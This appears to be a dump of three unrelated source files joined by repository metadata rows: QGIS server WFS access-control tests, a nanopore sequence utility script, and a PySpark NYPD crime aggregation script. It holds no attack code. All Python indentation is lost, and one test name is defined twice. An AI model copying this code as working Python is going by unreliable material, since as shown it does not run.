query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "DescribeFeatureType",
"TYPENAME": "Country"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find('name="Country"') != -1,
"No Country layer in DescribeFeatureType\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find('name="Country"') != -1,
"Unexpected Country layer in DescribeFeatureType\n%s" % response)
def test_wfs_getfeature_hello(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"No color in result of GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"Unexpected color in result of GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>NULL</qgs:color>") != -1, # spellok
"Unexpected color NULL in result of GetFeature\n%s" % response)
def test_wfs_getfeature_hello2(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>2</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_filter(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Filter" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_filter2(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Filter" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>6</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_country(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_OnOff" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response) # spellok
# # Subset String # #
def test_wfs_getfeature_subsetstring(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
def test_wfs_getfeature_subsetstring2(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>2</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_project_subsetstring(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for retrieving a feature which should be available in with/without access control
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>7</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be one result
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Feature with pkuid=7 not found in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Feature with pkuid=7 not found in GetFeature, has been incorrectly filtered out by access controls\n%s" % response)
def test_wfs_getfeature_project_subsetstring2(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for a feature which should be filtered out by access controls
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>8</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be one result
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>8</qgs:pk>") != -1,
"Feature with pkuid=8 not found in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Feature with pkuid=8 was found in GetFeature, but should have been filtered out by access controls\n%s" % response)
def test_wfs_getfeature_project_subsetstring3(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for a features which should be filtered out by project subsetStrings.
For example, pkuid 6 passes the access control checks, but should not be shown because of project layer subsetString
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>6</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be no results, since pkuid 1 should be filtered out by project subsetString
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") == -1,
"Project based layer subsetString not respected in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Project based layer subsetString not respected in GetFeature with restricted access\n%s" % response)
def test_wfs_getfeature_exp_filter_hello(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello",
"EXP_FILTER": "pkuid = 1"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"No color in result of GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"Unexpected color in result of GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>NULL</qgs:color>") != -1, # spellok
"Unexpected color NULL in result of GetFeature\n%s" % response)
def test_wfs_getfeature_exp_filter_hello2(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello",
"EXP_FILTER": "pkuid = 2"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_exp_filter_hello_filter(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello_Filter",
"EXP_FILTER": "pkuid = 1"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_exp_filter_hello_filter2(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello_Filter",
"EXP_FILTER": "pkuid = 6"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_featureid_hello(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello",
"FEATUREID": "Hello.1"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"No color in result of GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"Unexpected color in result of GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>NULL</qgs:color>") != -1, # spellok
"Unexpected color NULL in result of GetFeature\n%s" % response)
def test_wfs_getfeature_featureid_hello(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello",
"FEATUREID": "Hello.2"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_featureid_hello_filter(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello_Filter",
"FEATUREID": "Hello_Filter.1"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_featureid_hello_filter2(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello_Filter",
"FEATUREID": "Hello_Filter.6"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
if __name__ == "__main__":
unittest.main()
| gpl-2.0 | 4,745,902,798,118,145,000 | 44.786738 | 128 | 0.574504 | false |
UCSC-nanopore-cgl/nanopore-RNN | nanotensor/signalAlign-utils.py | 1 | 7219 | #!/usr/bin/env python
"""
This is a place for small scripts and utility functions
"""
########################################################################
# File: utils.py
# executable: utils.py
# Purpose: maintain some simple functions as needed
# make sure all events are represented from output from signalalign
# stderr: errors and status
# stdout:
#
# Author: Rojin Safavi
# History: 06/01/2017 Created
from __future__ import print_function
import sys
from timeit import default_timer as timer
import glob
import random
import re
import numpy as np
from Bio.Seq import Seq
from utils import get_project_file, project_folder
from pandas import DataFrame
# from Bio.Alphabet import generic_dna
def get_refrence_and_edit(referencePath, reference_Modified_Path):
"""Get fast5 file and remove \n from the ends"""
with open(reference_Modified_Path, 'w') as outfile, open(referencePath, 'r') as infile:
for line in infile:
if ">" in line:
outfile.write(line)
else:
T = line.rstrip()
outfile.write(T)
def get_motif_complement(motif):
"""get the complement of a motif, cuurrently works with A,T,C,G,E,X,O
ex: the complement of ATCO is TAGO"""
dna = Seq(motif)
motif_complement = str(dna.complement())
return motif_complement
def get_motif_REVcomplement(motif):
"""get the complement of a motif, cuurrently works with A,T,C,G,E,X,O
ex: the REVcomplement of ATCO is OGAT"""
dna = Seq(motif)
rev_complement = str(dna.reverse_complement())
return rev_complement
def store_seq_and_name(reference_modified_Path):
sequence_list = ""
seq_name = ""
with open(reference_modified_Path, 'r') as infile:
for line in infile:
if ">" in line:
seq_name = seq_name + line.rsplit()[0].split(">")[1]
else:
sequence_list = sequence_list + line
return seq_name, sequence_list
def replace_nucleotide(motif, replacement):
"""compares motifs and modifed motif and
tells you what nucleotide is modified
ex: ("CCAGG","CFAGG") => C"""
pos = [i for i in range(len(motif)) if motif[i] != replacement[i]][0]
old_char = motif[pos]
new_char = replacement[pos]
rev_comp_pos = len(motif)-pos-1
return pos, old_char, new_char, rev_comp_pos
def nuc_position(seq_str, char):
"""Finds all positions of specific character
withing sequence"""
motif_position = [m.start() for m in re.finditer(char, seq_str)]
return motif_position
def make_bed_file(ref_modified_path, bed_path, *args):
""" NOTE: USE "F" CHAR TO DISTINGUISH MODIFIED POSITION WITHIN MOTIF
NOTE: CHAR can be E or X
ex: x : args = [("CCAGG","CFAGG"), ("CCTGG","CFTGG")]"""
seq_name, reference = store_seq_and_name(ref_modified_path)
with open(bed_path, "w") as outfile:
for pair in args:
motif = pair[0]
modified = pair[1]
# get pos, old character and the replacement character
pos, old_char, new_char, rev_comp_pos = replace_nucleotide(motif, modified)
# get get rev_complement of motif and modified
motif_comp = get_motif_REVcomplement(motif)
# changed from rev complement to expand the alphabet and not contain
# replacements to a single character, it can be different across motifs
modified_comp = motif_comp[:rev_comp_pos] + new_char + \
motif_comp[rev_comp_pos+1:]
seq_str_fwd = reference.replace(motif, modified)
seq_str_bwd = reference.replace(motif_comp, modified_comp)
nuc_positions = nuc_position(seq_str_fwd, new_char)
for pos in nuc_positions:
outfile.write(seq_name + "\t" + np.str(pos) + "\t" + "+" + "\t"
+ old_char +"\t" + new_char + "\n")
nuc_positions = nuc_position(seq_str_bwd, new_char)
for pos in nuc_positions:
outfile.write(seq_name + "\t" + np.str(pos) + "\t" + "-" + "\t"
+ old_char +"\t" + new_char + "\n")
def sorting(bed_path):
'''sort the bed file'''
df = DataFrame.from_csv(bed_path, sep='\t', header=None)
df_sorted = df.sort_values([2,1], ascending=[True,True])
return df_sorted
def save_as_tsv(bed_path, sorted_bed_path):
'''save the sorted bedfile as tsv'''
s = ''
sorted_table = sorting(bed_path) # df sorted
for i in DataFrame.to_csv(sorted_table, sep='\t'):
s = s + i
g = s.split("\n")
with open(sorted_bed_path, "w") as tsv_file:
for i in g:
if "0\t1\t2\t3\t4" not in i:
tsv_file.write(i + "\n")
## Concatenate control and experimental assignments
## ex : concatenation of non methylated and methylated assignments
def concat_assignments (assignments_path1, assignments_path2, output, op_prefix):
"""concatenates control and experimental assignments"""
read_files = glob.glob(assignments_path1 + "/*." + op_prefix) + glob.glob(assignments_path2 + "/*." + op_prefix)
with open(output, "w") as outfile:
for f in read_files:
with open(f, "rb") as infile:
outfile.write(infile.read())
## for each kmer in assignmnets get 50 assignment or less
def get_sample_assignments(concat_assign_path, output_sampled):
kmerDict = dict()
with open(concat_assign_path, "r") as infile:
for i in infile:
key = i.split("\t")[0]
value = "\t".join(i.split("\t")[1:])
if kmerDict.has_key(key):
kmerDict[key].append(value)
else:
kmerDict[key] = [value]
with open(output_sampled, "w") as outfile:
for key, value in kmerDict.iteritems():
mylist = kmerDict[key]
if len(mylist) >= 50:
rand_smpl = [mylist[i] for i in random.sample(range(len(mylist)), 50)]
for g in rand_smpl:
string = ''.join(g)
outfile.write(key + "\t" + string)
elif len(mylist) < 50:
rand_smpl = [mylist[i] for i in random.sample(range(len(mylist)), len(mylist))]
for g in rand_smpl:
string = ''.join(g)
outfile.write(key + "\t" + string)
def main():
"""Test the methods"""
start = timer()
ref_seq = get_project_file("/testing/reference-sequences/ecoli_k12_mg1655.fa")
reference_modified_path = project_folder()+"/testing/reference-sequences/ecoli_k12_mg1655_modified.fa"
get_refrence_and_edit(ref_seq, reference_modified_path)
bed_file_path = project_folder()+"/testing/reference-sequences/CCAGG_modified2.bed"
sorted_bed_file_path = project_folder()+"/testing/reference-sequences/CCAGG_modified2_sorted.bed"
char = "E"
make_bed_file(reference_modified_path, bed_file_path, ["CCTGG","CETGG"], ["CCAGG","CEAGG"])
save_as_tsv(bed_file_path, sorted_bed_file_path)
stop = timer()
print("Running Time = {} seconds".format(stop-start), file=sys.stderr)
if __name__ == "__main__":
main()
raise SystemExit
| mit | -4,013,240,917,253,713,400 | 38.021622 | 116 | 0.598836 | false |
leedtan/SparklesSunshinePuppies | kycd_y_m_d_mapreduce.py | 1 | 5916 | #!/usr/bin/env python
'''
pyspark --packages com.databricks:spark-csv_2.11:1.5.0 --executor-memory 4g
'''
from pyspark import SparkContext
import os
from datetime import datetime
from datetime import date
from pyspark.sql.functions import col, udf
from pyspark.sql.types import DateType
import re
from pyspark.sql.functions import unix_timestamp
from pyspark.sql.types import IntegerType
def get_year(inputs):
y, m, d = str(inputs).split('-')
return int(y)
def get_month(inputs):
y, m, d = str(inputs).split('-')
return int(m)
def get_day(inputs):
y, m, d = str(inputs).split('-')
day = date(int(y), int(m), int(d)).isoweekday()
return day
##############################################################################
def is_date_lv(string):
if re.findall('\s*(([0]\d)|([1][0-2]))/([0-2]\d|[3][0-1])/(\d\d\d\d)', string):
return True
else:
return False
def is_time_lv(string):
if re.findall('(([01]\d)|(2[0-3]))\:([0-5]\d)\:([0-5]\d)', string):
return True
else:
return False
to_date_lv = udf(lambda x: datetime.strptime(x.strip(), '%m/%d/%Y') if is_date_lv(x) else datetime.strptime('01/01/1001', '%m/%d/%Y'), DateType())
# to_time_lv = udf(lambda x: datetime.strptime(x.strip(), '%H:%M:%S') if is_time_lv(x) else datetime.strptime('01:01:01', '%H:%M:%S'), DateType())
to_year = udf(lambda x: get_year(x), IntegerType())
to_month = udf(lambda x: get_month(x), IntegerType())
to_day = udf(lambda x: get_day(x), IntegerType())
# read the crime data into a dataframe
df = sqlContext.read.format('com.databricks.spark.csv').options(header=True, inferschema='true', sep=', ').load('NYPD_Complaint_Data_Historic.csv')
df = df.withColumn('CMPLNT_TO_DT', to_date_lv(col('CMPLNT_TO_DT')))
df = df.withColumn('CMPLNT_FR_DT', to_date_lv(col('CMPLNT_FR_DT')))
# df = df.withColumn('CMPLNT_TO_TM', to_time_lv(col('CMPLNT_TO_TM')))
# df = df.withColumn('CMPLNT_FR_TM', to_time_lv(col('CMPLNT_FR_TM')))
df = df.withColumn('RPT_DT', to_date_lv(col('RPT_DT')))
# read the crime data types into the dataframe
typedf = sqlContext.read.format('com.databricks.spark.csv').options(header = False, inferschema='true').load('types.csv')
header = ['id','CMPLNT_NUM','CMPLNT_FR_DT','CMPLNT_FR_TM','CMPLNT_TO_DT',
'CMPLNT_TO_TM','RPT_DT','KY_CD','OFNS_DESC','PD_CD','PD_DESC',
'CRM_ATPT_CPTD_CD','LAW_CAT_CD','JURIS_DESC','BORO_NM',
'ADDR_PCT_CD','LOC_OF_OCCUR_DESC','PREM_TYP_DESC','PARKS_NM',
'HADEVELOPT','X_COORD_CD','Y_COORD_CD','Latitude','Longitude','Lat_Lon']
for i in range(25):
typedf = typedf.withColumnRenamed("C" + str(i), header[i])
# Create sql tables
# sqlContext.registerDataFrameAsTable(df,'crimedata')
sqlContext.registerDataFrameAsTable(typedf,'crimetype')
##############################################################################
# Create new sql dateframe
df_temp = df.withColumn('CMPLNT_YEAR', to_year(col('CMPLNT_FR_DT')))
df_temp = df_temp.withColumn('CMPLNT_MONTH', to_month(col('CMPLNT_FR_DT')))
df_dt = df_temp.withColumn('CMPLNT_DAY', to_day(col('CMPLNT_FR_DT')))
# Create new sql table
sqlContext.registerDataFrameAsTable(df_dt,'crimedt')
###############################
# Time Series Analysis - Year #
###############################
df_year_valid = sqlContext.sql("\
SELECT crimedt.CMPLNT_YEAR, crimedt.KY_CD, count(*) as c \
FROM crimetype \
INNER JOIN crimedt \
ON crimedt.CMPLNT_NUM = crimetype.id \
WHERE crimetype.CMPLNT_FR_DT = 'date' \
AND crimetype.CMPLNT_TO_DT = 'date' \
AND crimedt.CMPLNT_TO_DT >= crimedt.CMPLNT_FR_DT\
GROUP BY crimedt.CMPLNT_YEAR, crimedt.KY_CD\
ORDER BY crimedt.CMPLNT_YEAR, c DESC\
")
lines = df_year_valid.map(lambda x: (x[0], ",".join([ str(z) for z in x[1:] ])))
with open("year_valid.csv", "a") as out_file:
for line in lines.collect():
result = re.findall('\d+', str(line))
print >>out_file, ','.join(result)
################################
# Time Series Analysis - Month #
################################
df_month_valid = sqlContext.sql("\
SELECT crimedt.CMPLNT_MONTH, crimedt.KY_CD, count(*) as c \
FROM crimetype \
INNER JOIN crimedt \
ON crimedt.CMPLNT_NUM = crimetype.id \
WHERE crimetype.CMPLNT_FR_DT = 'date' \
AND crimetype.CMPLNT_TO_DT = 'date' \
AND crimedt.CMPLNT_TO_DT >= crimedt.CMPLNT_FR_DT\
GROUP BY crimedt.CMPLNT_MONTH, crimedt.KY_CD\
ORDER BY crimedt.CMPLNT_MONTH, c DESC\
")
lines = df_month_valid.map(lambda x: (x[0], ",".join([ str(z) for z in x[1:] ])))
with open("month_valid.csv", "a") as out_file:
for line in lines.collect():
result = re.findall('\d+', str(line))
print >>out_file, ','.join(result)
##############################
# Time Series Analysis - Day #
##############################
df_day_valid = sqlContext.sql("\
SELECT crimedt.CMPLNT_DAY, crimedt.KY_CD, count(*) as c \
FROM crimetype \
INNER JOIN crimedt \
ON crimedt.CMPLNT_NUM = crimetype.id \
WHERE crimetype.CMPLNT_FR_DT = 'date' \
AND crimetype.CMPLNT_TO_DT = 'date' \
AND crimedt.CMPLNT_TO_DT >= crimedt.CMPLNT_FR_DT\
GROUP BY crimedt.CMPLNT_DAY, crimedt.KY_CD\
ORDER BY crimedt.CMPLNT_DAY, c DESC\
")
lines = df_day_valid.map(lambda x: (x[0], ",".join([ str(z) for z in x[1:] ])))
with open("day_valid.csv", "a") as out_file:
for line in lines.collect():
result = re.findall('\d+', str(line))
print >>out_file, ','.join(result)
